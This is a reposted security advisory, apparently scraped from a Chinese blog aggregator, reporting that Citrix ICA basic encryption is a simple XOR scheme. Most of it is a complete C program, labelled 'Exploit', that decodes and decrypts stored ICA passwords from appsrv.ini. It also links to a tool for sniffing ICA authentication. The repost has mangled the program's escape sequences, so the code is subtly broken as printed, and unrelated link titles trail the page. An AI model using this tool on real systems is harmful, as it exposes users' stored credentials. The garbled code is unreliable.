Citrix ICA's basic encryption has been cracked
来源:互联网 发布:查看linux安装的字体 编辑:程序博客网 时间:2024/04/30 08:08
The ICA basic encryption algorithm is a variant of the simple XOR scheme used for saved Winframe passwords:
void decrypt(u_char key, u_char *p, int len)
{
int i;
for (i = len; i > 0; i--)
p[i] = p[i-1] ^ p[i] ^ key;
p[0] ^= (key | 'C');
}
Exploit:
The following will decrypt stored Citrix ICA passwords (in appsrv.ini).
/*
icadecrypt.c
Dug Song <dugsong@monkey.org>
*/
#include <sys/types.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
int
hex_decode(char *src, u_char *dst, int outsize)
{
char *p, *pe;
u_char *q, *qe, ch, cl;
pe = src + strlen(src);
qe = dst + outsize;
for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) {
ch = tolower(p[0]);
cl = tolower(p[1]);
if ((ch >= '0') && (ch <= '9')) ch -= '0';
else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10;
else return (-1);
if ((cl >= '0') && (cl <= '9')) cl -= '0';
else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10;
else return (-1);
*q++ = (ch << 4) | cl;
}
return (q - dst);
}
int
ica_decrypt(u_char *pass, int len)
{
u_short i;
u_char *p, key;
if (len < 4)
return (0);
i = ntohs(*(u_short *)pass);
if (i != len - 2)
return (0);
key = pass[2];
p = pass + 3;
for (i -= 2; i > 0; i--)
p[i] = p[i - 1] ^ p[i] ^ key;
p[0] ^= (key | 'C');
i = len - 3;
memmove(pass, pass + 3, i);
pass[i] = '/0';
return (1);
}
void
usage(void)
{
fprintf(stderr, "Usage: icadecrypt <file>/n");
exit(1);
}
int
main(int argc, char *argv[])
{
FILE *f;
u_char line[1024], pass[128];
int len;
if (argc != 2 || *argv[1] == '-')
usage();
if ((f = fopen(argv[1], "r")) == NULL) {
perror("fopen");
exit(1);
}
while (fgets(line, sizeof(line), f) != NULL) {
if (strncmp(line, "Password=", 9) == 0) {
len = hex_decode(line + 9, pass, sizeof(pass));
if (ica_decrypt(pass, len))
printf("; icadecrypt: [%s]/n", pass);
}
printf("%s", line);
}
fclose(f);
exit(0);
}
/* 5000. */
----------------
Demonstration code to sniff (and decrypt) ICA network authentication is available at:
http://www.monkey.org/~dugsong/dsniff/
Citrix offers a secure alternative called SecureICA, which uses Diffie-Hellman for key exchange and RC5 to encrypt the underlying transport (now at 128-bit strength worldwide). While this is certainly better than the simple XOR scheme outlined above, it may still be vulnerable to an active man-in-the-middle attack. Caveat user.
http://www.citrix.com/products/sica/
(NOTE: The SecureICA supported client is only available for Windows)
- Citrix ICA's basic encryption has been cracked
- Citrix ICA
- Laravel 出现 No application encryption key has been specified.
- Laravel 5.5 .No application encryption key has been specified
- HDX(CITRIX ICA)与ICA
- citrix协议ICA技术原理
- citrix协议ICA技术原理
- citrix协议ICA技术原理
- Laravel运行出错RuntimeException No application encryption key has been specified.
- [news]Vista have been cracked.
- High Power Encryption 4.0 Cracked by KuNgBiM
- [转载] Citrix的ICA协议介绍
- Citrix的ICA协议介绍与对比
- java.lang.IllegalStateException: The ImageView's ScaleType has been changed
- Citrix的ICA Client的其它安装方式
- citrix 的ICA协议的分析和下载地址
- PCoIP vs HDX (CITRIX ICA)远程访问协议对比
- Fedoar/Linux下ica文件打开——Citrix Receiver
- JavaBean的get、set方法生成器
- 改变鼠标显示样式
- 【C语言小练习】 任意输入N个数,输出其由大到小的数据。
- 画直线(橡皮筋)
- 美到极致是疯狂
- Citrix ICA's basic encryption has been cracked
- php为图片添加水印
- 编写自己的who命令
- wince编程常用控制窗体API
- wince编程常用控制窗体API
- css position: absolute、relative详解
- wince编程常用控制窗体API
- SetRop2设定绘图方式
- 创建文件夹、创建文件、拷贝文件